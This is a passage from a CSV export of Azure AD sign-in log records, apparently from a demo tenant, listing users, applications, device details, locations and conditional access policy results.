'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3f80e775-4028-4bc5-9e8b-649b26930f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3f80e775-4028-4bc5-9e8b-649b26930f00,SigninLogs,Sucess,33.7984581,-84.38828278
+755,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,80c7469f-80aa-0000-5d33-f615727add92,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc0c2580f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,dfda3bbc-b55b-4a89-a1fb-2fc0c2580f00,SigninLogs,Sucess,33.7984581,-84.38828278
+756,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:14.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0210db31-4bbd-4562-aea8-1e521361aa1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5afde7f0-808d-4fd5-9a61-613468bc0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5afde7f0-808d-4fd5-9a61-613468bc0d00,SigninLogs,Sucess,36.6404686,-78.26995087
+757,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:03.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,51ca469f-a07a-0000-470b-274517a53474,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db359221-fdda-4bf1-8b37-6f4624bb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,db359221-fdda-4bf1-8b37-6f4624bb1300,SigninLogs,Sucess,41.90428925,-85.99833679
+758,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:13.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4bf53989-47a3-4106-9d9a-1d6e80ec84df,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c3948ee8-6ff9-4ccf-8b26-9737a6220c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3948ee8-6ff9-4ccf-8b26-9737a6220c00,SigninLogs,Sucess,36.6404686,-78.26995087
+759,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:11.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d6227b9-666d-4e5d-b270-2762aae41dcc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",178eb907-c36d-4662-9369-da022fb01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,178eb907-c36d-4662-9369-da022fb01400,SigninLogs,Sucess,33.7984581,-84.38828278
+760,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:07.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,438d89ff-6d2f-4b8d-bc83-3c99d5716251,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ef5316a-deee-4f03-8fd7-4abfaeb11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5ef5316a-deee-4f03-8fd7-4abfaeb11300,SigninLogs,Sucess,41.90428925,-85.99833679
+761,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ec3876e-72b1-4174-b70b-e0ce31414ecc,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8361f2d3-1959-4242-988e-de2dab2e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8361f2d3-1959-4242-988e-de2dab2e0e00,SigninLogs,Sucess,36.6404686,-78.26995087
